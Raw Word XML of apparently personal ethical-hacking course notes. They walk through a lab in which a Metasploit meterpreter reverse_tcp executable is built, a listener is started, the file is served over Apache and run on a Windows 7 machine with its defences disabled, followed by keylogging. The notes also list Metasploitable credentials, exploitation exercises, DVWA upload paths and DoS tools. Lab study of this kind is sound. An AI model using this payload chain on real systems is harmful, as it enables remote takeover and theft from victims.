      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=192.168.1.101 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000450" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-f exe &gt; /root/Desktop/test.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000451" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000452" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Output file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be saved in desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000453" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000454" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Terminal 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000455" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000456" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000457" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000458" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000459" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000045A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0000045B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>It will wait for output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000045C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000045D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Terminal 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000045E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>For file sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000045F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000460" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000461" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Copy the virus.exe and place it in var/www/html/virus.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000462" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000463" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WINDOWS 7 MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000464" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Turn off firewall and A/V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000465" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>open browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000466" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000467" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>virus.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000468" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>download and run this file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000469" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000046A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WE will get output in terminal 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000046B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000046C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Meterpreter session 1 opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000046D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000046E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">&gt;help </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000046F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000470" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000471" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&gt;try keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000472" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&gt;try remote desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000473" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000474" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>07-10-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000475" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000476" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NETWORK SETTINGS - BRIDGED ADAPTOR - METASPLOITABLE 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000477" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>LOGIN DETAILS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000478" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">username - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000479" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">password - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000047A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000047B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000047C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000047D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000047E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000047F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000480" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000481" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000482" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000483" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000484" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000485" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000486" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000487" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000488" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000489" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000048A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000048B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000048C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000048D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000048E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000048F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000490" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000491" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000492" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000493" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000494" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000495" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000496" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000497" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. Find out the technology used by the IP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>asp,php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>..)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000498" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. List our 5 main vulnerable directories of the IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000499" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. Perform command line exploit of FTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000049A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Exploit FTP using an exploit available in MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000049B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. Exploit port 80 using MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000049C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>6. Exploit port 139 - Samba using MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000049D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>7. Exploit port 6667 using a backdoor with MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000049E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">8. Check if the there is any issue with Apache server? if so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the issue/vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000049F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>9. What HTTP methods are allowed for this IP / Server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">10. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server is running on which OS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>28-10-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>FILE UPLOAD VULNERABILITIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.104/dvwa/vulnerabilities/upload/#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>../../hackable/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testt.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.104/dvwa/hackable/uploads/testt.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>11-01-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DOS | DDOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Distributed Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Types of DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Internal DOS (Inside a LAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- External DOS (In WAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Server will be down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Server will slowed down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Loss of DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Internal DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Only your computer will be able to access internet and other computers </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be able to access internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Monitoring Tool - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Etherape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attack Tool - Yersinia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Performs DHCP Starvation attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>External DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">it functions based on sending any request </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>continously</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> within a short period of time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">TOOL - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pentmenu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Xerxes, LOIC, XOIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ROBOLINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SABAYON LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>08-11-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>STEGANOGRAPHY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-Art of hiding something into something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Using system inbuilt utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Softwares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stegohide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Using SFX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Using system inbuilt utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
